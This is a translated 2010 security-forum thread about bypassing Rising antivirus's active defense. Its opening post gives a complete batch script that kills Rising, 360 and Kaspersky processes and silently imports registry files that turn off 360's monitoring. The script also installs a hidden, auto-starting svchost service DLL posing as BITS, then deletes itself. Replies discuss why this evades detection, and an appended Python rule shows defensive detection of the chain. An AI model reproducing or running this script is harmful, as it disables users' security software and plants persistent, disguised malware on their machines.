Rising Kaka Security Forum > Enterprise product discussion > Rising 2010 new product trial challenge area

Rising does not intercept batch files: use a batch file to create and import a registry file to bypass active defense!!!

Run this batch file; it automatically creates the registry files and imports them!!!

Rising did not intercept the registry import action!!!




Below is the source of the .bat:




@echo off
REM Kill the resident processes of Rising (rstray) and 360 before touching the registry
taskkill /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
REM kill.reg: set 360Safe's real-time monitoring switches (safemon) to 0
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
echo "MonAccess"=dword:00000000>>kill.reg
echo "SiteAccess"=dword:00000000>>kill.reg
echo "ExecAccess"=dword:00000000>>kill.reg
echo "UDiskAccess"=dword:00000000>>kill.reg
echo "LeakShowed"=dword:00000000>>kill.reg
REM Register a placeholder service named DARK; its definition is overwritten by importing dark.reg below
sc create DARK binpath= %windir%\System32\darkkill.dll
sc config DARK start= disabled
REM dark.reg: turn DARK into an svchost-hosted netsvcs service whose DisplayName copies BITS.
REM The hex(2) values are UTF-16LE strings: ImagePath decodes to svchost.exe -k netsvcs under the
REM system directory, ServiceDll decodes to the darkkill.dll path in system32.
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
echo "Type"=dword:00000110>>dark.reg
echo "Start"=dword:00000002>>dark.reg
echo "ErrorControl"=dword:00000001>>dark.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
echo  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
echo  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
echo  6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo "DependOnGroup"=hex(7):00,00>>dark.reg
echo "ObjectName"="LocalSystem">>dark.reg
echo "Description"=hex(2):00,00>>dark.reg
echo.>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
echo  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
echo  72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo.>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
echo  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
echo  00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
echo  05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
echo  20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
echo  00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
echo  00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo.>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
echo "Count"=dword:00000001>>dark.reg
echo "NextInstance"=dword:00000001>>dark.reg
REM Import both files silently (no prompt), drop the DLL, start the service, then clean up
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\System32\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\System32\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0

Save the above code as a text file and change its extension to .bat.

Attachment: 1.rar (application/octet-stream), downloaded 477 times, uploaded 2010-1-24 3:40:36

Last edited by shulun743 on 2010-01-24 03:40:36

Re: Rising does not intercept batch files: use a batch file to create and import a registry file to bypass active defense!!!

Because batch files rely on the system's own programs.

Almost all antivirus products, so as not to interfere with the user's use of the computer, let Microsoft-signed programs do their work by default.

If you uncheck "automatically allow signed programs" under "System Hardening", it should report some of this.
 

Re: Rising does not intercept batch files: use a batch file to create and import a registry file to bypass active defense!!!

This user's post content has been hidden.
 

Re: Rising does not intercept batch files: use a batch file to create and import a registry file to bypass active defense!!!

I suggest that Rising should intercept when registry files are loaded!!!
 

Re: Rising does not intercept batch files: use a batch file to create and import a registry file to bypass active defense!!!

Just running this batch file on its own certainly won't be intercepted.
If there is a corresponding virus that drops a batch file like this and runs it, then it will be intercepted.
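The two replies above make one detection point between them: every command the batch runs is a Microsoft-signed system tool that a signature whitelist lets through, so what separates the attack from an administrator's work is the chain, a dropped executable running a batch that kills the AV processes, imports a .reg file silently and registers a service. The following Python is an added example, not from the thread or from Rising: it correlates process-creation records per cmd.exe instance and alerts only when one batch run shows several of those tactics, so a lone "regedit /s" from an interactive prompt stays quiet. EVENTS is constructed sample telemetry in a made-up schema; the security-product process names are the ones the batch kills, and the tactic patterns and threshold are assumptions.

```python
"""Correlate process-creation telemetry for the pattern the batch produces.

Added example, not from the forum post. EVENTS is a constructed set of
process-creation records (pid, ppid, image, command line) in a made-up
schema; the security-product process names are the ones the batch kills,
the tactic patterns and the alert threshold are assumptions.
"""
import re

# Process names the post's batch terminates with taskkill
SECURITY_PROCESSES = {"rstray.exe", "360tray.exe", "360safe.exe", "kav.exe"}

# (tag, pattern, extra check on the match) for the individual commands the batch runs
TACTICS = [
    ("kill-security-tool",
     re.compile(r"\btaskkill\b.*\s/im\s+(\S+)", re.I),
     lambda m: m.group(1).lower() in SECURITY_PROCESSES),
    ("silent-reg-import",
     re.compile(r"\bregedit(?:\.exe)?\s+/s\b", re.I),
     lambda m: True),
    ("service-create-or-config",
     re.compile(r"\bsc(?:\.exe)?\s+(?:create|config)\b", re.I),
     lambda m: True),
    ("service-start",
     re.compile(r"\b(?:sc(?:\.exe)?|net(?:\.exe)?)\s+start\b", re.I),
     lambda m: True),
]


def classify(cmdline):
    """Return the set of tactic tags one command line matches."""
    tags = set()
    for tag, pattern, accept in TACTICS:
        m = pattern.search(cmdline)
        if m and accept(m):
            tags.add(tag)
    return tags


def correlate(events, threshold=2):
    """Group children by the cmd.exe that spawned them (one batch run = one cmd.exe)
    and alert when a single run shows at least `threshold` distinct tactics."""
    by_pid = {e["pid"]: e for e in events}
    per_shell = {}
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower().endswith("\\cmd.exe"):
            per_shell.setdefault(parent["pid"], set()).update(classify(e["cmdline"]))
    alerts = []
    for pid, tags in per_shell.items():
        if len(tags) >= threshold:
            shell = by_pid[pid]
            launcher = by_pid.get(shell["ppid"], {}).get("image", "unknown")
            alerts.append({"cmd_pid": pid, "launched_by": launcher,
                           "cmdline": shell["cmdline"], "tactics": sorted(tags)})
    return alerts


# Constructed sample telemetry: dark.exe drops and runs the batch (pids 100-204);
# an administrator imports a single .reg file from an interactive prompt (300-301).
EVENTS = [
    {"pid": 1,   "ppid": 0,   "image": r"C:\Windows\explorer.exe",          "cmdline": "explorer.exe"},
    {"pid": 100, "ppid": 1,   "image": r"C:\Users\test\Downloads\dark.exe", "cmdline": "dark.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",      "cmdline": 'cmd.exe /c "1.bat"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /f /im rstray.exe"},
    {"pid": 202, "ppid": 200, "image": r"C:\Windows\System32\regedit.exe",  "cmdline": "regedit /s dark.reg"},
    {"pid": 203, "ppid": 200, "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc create DARK binpath= C:\Windows\System32\darkkill.dll"},
    {"pid": 204, "ppid": 200, "image": r"C:\Windows\System32\net.exe",      "cmdline": "net start DARK"},
    {"pid": 300, "ppid": 1,   "image": r"C:\Windows\System32\cmd.exe",      "cmdline": "cmd.exe"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\regedit.exe",  "cmdline": "regedit /s theme.reg"},
]


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

On the sample, only the cmd.exe launched by dark.exe trips the rule, with all four tactics; the interactive prompt that imports theme.reg scores one and is ignored. Grouping by the shell rather than by the individual tool is what lets the rule fire on the batch while still passing each signed utility on its own.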